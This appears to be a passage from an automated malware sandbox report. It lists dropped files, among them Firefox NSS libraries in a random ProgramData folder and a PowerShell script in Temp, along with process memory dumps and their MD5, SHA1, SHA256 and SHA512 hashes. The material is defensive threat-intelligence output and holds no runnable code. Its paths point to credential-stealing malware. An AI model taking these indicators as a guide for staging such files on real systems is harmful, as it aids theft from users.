SHA512 ecd3f77729cbe4ddde065bb6d59cef14752ea3140ee88c4c42ecb9483317d0f52dc3c12590c35977d01a55baca14160beb58a56e44ed4610388adef4c0ceae21

memory/3160-239-0x0000000072C50000-0x0000000072DCB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\598ea492

MD5 915918feadba794afbcbb4df7a2d6099
SHA1 3e6bf083fdc9170cbed6eedf1485055f4e5a8f82
SHA256 c06762e4b0f4dbccdc4d24e33402b2fc8faa45a7ab2b5673167d78c2433cfaa9
SHA512 255b39b14e16d06379d1b15faa204fd84da4368b0fdcc242526244319f68a2c08e37f2fa4c3edb4c957286027ca75252b845aa70c942e6826c5322548e74380e

C:\ProgramData\BAEBGCFIEHCF\FHJDGH

MD5 ad8d9a6ea592a6c8a78c67a805cec952
SHA1 3e9f35013044be456f33e300418453ab12c70df8
SHA256 696c10112d8b86a46e5057cbd0bf40728e79c6bb49cda1f2c67fe45d0fc1258d
SHA512 31c1b5717432b67e6b150911747f34e8099c1a0870262bb3b5d3ac5c9e28b3b08e4239bd105408318806f983b3fcd10e617b2385511c46efe9fe58a9cd4a7067

memory/3876-249-0x00007FFB11E30000-0x00007FFB12025000-memory.dmp

memory/2904-250-0x00007FFB11E30000-0x00007FFB12025000-memory.dmp

memory/3820-260-0x0000000001030000-0x000000000177C000-memory.dmp

memory/3876-261-0x0000000072C50000-0x0000000072DCB000-memory.dmp

C:\ProgramData\BAEBGCFIEHCF\VCRUNT~1.DLL

MD5 a37ee36b536409056a86f50e67777dd7
SHA1 1cafa159292aa736fc595fc04e16325b27cd6750
SHA256 8934aaeb65b6e6d253dfe72dea5d65856bd871e989d5d3a2a35edfe867bb4825
SHA512 3a7c260646315cf8c01f44b2ec60974017496bd0d80dd055c7e43b707cadba2d63aab5e0efd435670aa77886ed86368390d42c4017fc433c3c4b9d1c47d0f356

C:\ProgramData\BAEBGCFIEHCF\softokn3.dll

MD5 4e52d739c324db8225bd9ab2695f262f
SHA1 71c3da43dc5a0d2a1941e874a6d015a071783889
SHA256 74ebbac956e519e16923abdc5ab8912098a4f64e38ddcb2eae23969f306afe5a
SHA512 2d4168a69082a9192b9248f7331bd806c260478ff817567df54f997d7c3c7d640776131355401e4bdb9744e246c36d658cb24b18de67d8f23f10066e5fe445f6

C:\ProgramData\BAEBGCFIEHCF\msvcp140.dll

MD5 5ff1fca37c466d6723ec67be93b51442
SHA1 34cc4e158092083b13d67d6d2bc9e57b798a303b
SHA256 5136a49a682ac8d7f1ce71b211de8688fce42ed57210af087a8e2dbc8a934062
SHA512 4802ef62630c521d83a1d333969593fb00c9b38f82b4d07f70fbd21f495fea9b3f67676064573d2c71c42bc6f701992989742213501b16087bb6110e337c7546

memory/2904-276-0x0000000072C50000-0x0000000072DCB000-memory.dmp

memory/1212-279-0x00007FFAF1BE0000-0x00007FFAF3257000-memory.dmp

memory/1212-283-0x0000000000400000-0x000000000040A000-memory.dmp

memory/3540-284-0x00007FFB11E30000-0x00007FFB12025000-memory.dmp

memory/4996-288-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/4996-292-0x000002729B5A0000-0x000002729B5C0000-memory.dmp

memory/4996-291-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/4996-290-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/4996-297-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/4996-296-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/4996-295-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/4996-293-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/4996-294-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/3540-298-0x00000000001B0000-0x0000000000221000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 0905580629d85fb977cf48d4681e5086
SHA1 3c7bf678bedbaf83ca720ab00fa9e84884ba8009
SHA256 72fd834aa73e1523e40a415313d7766832dd6497ac0a5d4cec9d36e852b248cd
SHA512 db9ae7da2801083074e54d499ef7741f7120b9a8abdd87c13e2ceb35520cd7290a4f06b6cc9c0c1060f01fe2cc0bd95b8d362029e0df90a68c17f197a50b02f4

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 a78524c7df0353916517a37d9543e6e1
SHA1 478a9f44860200e4f3c624133761d5419c3a49b9
SHA256 bbad630074e67d253f974d25bd19566f9abf2f8bd58c680080e0846c89261c19
SHA512 0c1a5b02f2547376368fcdae8c866a07461ab7b1244e5c377961febda9f98edc75e6af4d328a5d7c3a5489a79aa04cf6a0754459d230a0306210a07beadf4647

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 baf771b35afb92b92de9d4520e533dc8
SHA1 0a8c1161b98dd2e71927434f4b9f19e8377f8a1d
SHA256 a9b926d34058ed03c4fdf06cfceab4cc504bc2e7e32a777277b77ba43b19acfa
SHA512 89966493cf054c35accb13753361eae6ace6056daae90859499e1f22dc9175afd6ea4a89e3655f828254bb42a8e265e32d6d596d5b04302cd14e73c3844defbd

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 8202a1cd02e7d69597995cabbe881a12
SHA1 8858d9d934b7aa9330ee73de6c476acf19929ff6
SHA256 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
SHA512 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

C:\Users\Admin\AppData\Local\Temp\1000003041\run.ps1

MD5 1e49c49df1e9bb5a3646fbdd72fff72d
SHA1 ca3b2f92797030ad96341c5551812e679e9746d3
SHA256 df52ed4a147cad99aec03614368f8781e806c45be6e046ec4a73a26e7ec9cd10
SHA512 b0c96599de30f1822ddc99d1fed6341ae06f25a171c52b9a78f6304d02a30f8da41738d4af4b4c8365b0b52739b3df03be99dddf764f12f724bd24a91b59c82d

memory/4668-311-0x0000000002510000-0x0000000002546000-memory.dmp

memory/4668-312-0x0000000004F10000-0x0000000005538000-memory.dmp

memory/4668-313-0x0000000004E70000-0x0000000004E92000-memory.dmp

memory/4668-314-0x0000000005770000-0x00000000057D6000-memory.dmp

memory/4668-315-0x00000000057E0000-0x0000000005846000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bsimd13d.vpu.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4668-325-0x0000000005850000-0x0000000005BA4000-memory.dmp

memory/4668-326-0x0000000005E20000-0x0000000005E3E000-memory.dmp

memory/4668-327-0x0000000005E40000-0x0000000005E8C000-memory.dmp

memory/4668-329-0x0000000006E80000-0x0000000006F16000-memory.dmp

memory/3540-330-0x00000000001B0000-0x0000000000221000-memory.dmp

memory/4668-332-0x00000000063C0000-0x00000000063E2000-memory.dmp

memory/4668-331-0x0000000006350000-0x000000000636A000-memory.dmp

memory/4668-333-0x00000000074D0000-0x0000000007A74000-memory.dmp

memory/4668-334-0x0000000008100000-0x000000000877A000-memory.dmp